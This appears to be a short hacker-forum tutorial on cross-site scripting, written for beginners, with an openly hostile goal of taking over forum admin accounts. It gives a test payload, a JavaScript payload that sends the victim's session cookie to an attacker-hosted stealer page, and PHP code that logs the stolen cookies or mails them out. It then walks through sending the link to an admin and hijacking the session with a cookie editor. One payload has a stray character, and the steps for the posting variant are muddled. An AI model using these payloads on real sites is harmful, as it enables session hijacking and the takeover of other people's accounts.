XSS tutorial for Newbee's

[Newer]

XSS can be used in 2 conditions.
Sometimes there are forums that have particular fields that allow HTML posts..
Or a vulnerability in the search field.

A vulnerable search field that allows html searches and uses $_GET function instead of $_POST
Okay so.. lets talk about the Search field first. its easier lol

Testing Vulnerability
write in the search bar : <script>alert("XSS")</script>
Now an alert message should show XSS
If it didnt. than the search field is unexploitable.

Now to get a link that would redirect to your cookie stealer put this in the search :

Code:
<script language="Javascript">
1document.location="http://www.host.com/mysite/stealer.php?cookie=" + document.cookie;</script>
and send the link to the admin as a PM ..

Cookie stealer code :

Code:
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
?>
upload this to your host. than replace the link in the first javascript. Now pm the admin or anyuser u wanna hack.

As soon as the admin opens the link. the cookie should be saved in a text file on ur host...

Now download firefox and Cookie editor add-on. ( I'm too lazy to post links )

Put the cookies in the cookie editor and go to the website you should be logged on as admin ( If his session didnt end yet )

Now F**K that forum up !

Exploiting posts

You can exploit posts such as posting a comment on the admins profile ( wich allows html posts 99% of the time )

Post this

Code:
<?php
$cookie = $HTTP_GET_VARS["cookie"];
mail("me**mydomain.com", "Cookie stealer report", $cookie);
?>
Change the me**mydomain.com to your email. the cookies should be mailed to you.

Now as usual. add the cookies using your sexy cookie editor and than go to the website. If your lucky enough his session would not have expired yet..